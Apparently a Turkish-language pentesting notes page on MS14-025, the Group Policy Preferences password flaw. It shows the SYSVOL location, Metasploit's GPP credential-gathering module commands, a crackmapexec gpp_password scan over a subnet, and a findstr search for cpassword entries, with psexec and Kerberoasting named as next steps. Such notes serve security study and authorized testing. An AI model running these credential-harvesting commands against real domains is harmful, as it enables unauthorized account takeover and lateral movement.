# MS14-025 (GPP Abusing)

GPP'ler domain controller'da SYSVOL dosyası altında tutulur. Yetkili veya yetkisiz tüm kullanıcılar bu dosyaya erişebilir. Hatalı yapılandırılmış şifreleme politikasından dolayı bu şifreleri kırmak çok kolay olacaktır.

Konumu:&#x20;

\\\\\<DOMAIN\SYSVOL\\\<DOMAIN>\Policies\\

<figure><img src="https://2461890485-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZygBL34Vft9j04dWeA4C%2Fuploads%2FqDrzP8wC32i2wzWb0uw6%2Fimage.png?alt=media&#x26;token=c395c1c1-afeb-4c23-a2b6-7108e0daeb2e" alt=""><figcaption></figcaption></figure>

metasploit modülü kullanarak sysvoldaki gizli parola çıkartılabilir. Metasploit bu parolayı bizler için decrypt te eder.

<figure><img src="https://2461890485-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZygBL34Vft9j04dWeA4C%2Fuploads%2FFzHyOZoa7pFbt1j17SNe%2Fimage.png?alt=media&#x26;token=dbe63659-778c-4772-b95e-ef0eef4388b4" alt=""><figcaption></figcaption></figure>

Manuel olarak smb sunucusuna bağlanıp sysvolden bunu çekmekte mümkün. Manuel olarak çekersek bunu aşağıda ki toolu kullanarak kırmalıyız.

<figure><img src="https://2461890485-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZygBL34Vft9j04dWeA4C%2Fuploads%2FnGPtgsMyr5u1rJf2Chmv%2Fimage.png?alt=media&#x26;token=6822ad9a-cefe-44c7-ab57-5b7c7c9704b0" alt=""><figcaption></figcaption></figure>

Artık bir kullanıcı elde ettik. psexec vs ile bağlanabiliriz, eğer bağlanamazsak kerberosting saldırısı denenebilir.

#### **2. YOL:**

use post/windows/gather/credentials/gpp&#x20;

set session 1&#x20;

exploit

### Crackmapten kontrolü.

crackmapexec smb 10.10.20.0/24 -u kullanici -p parola -M gpp\_password

### **SYSVOL içerisinde Encrypt edilmiş cpasswordün tespit edilmesi**

findstr /S /I cpassword \\\\\sysvol\\\policies\\\*.xml
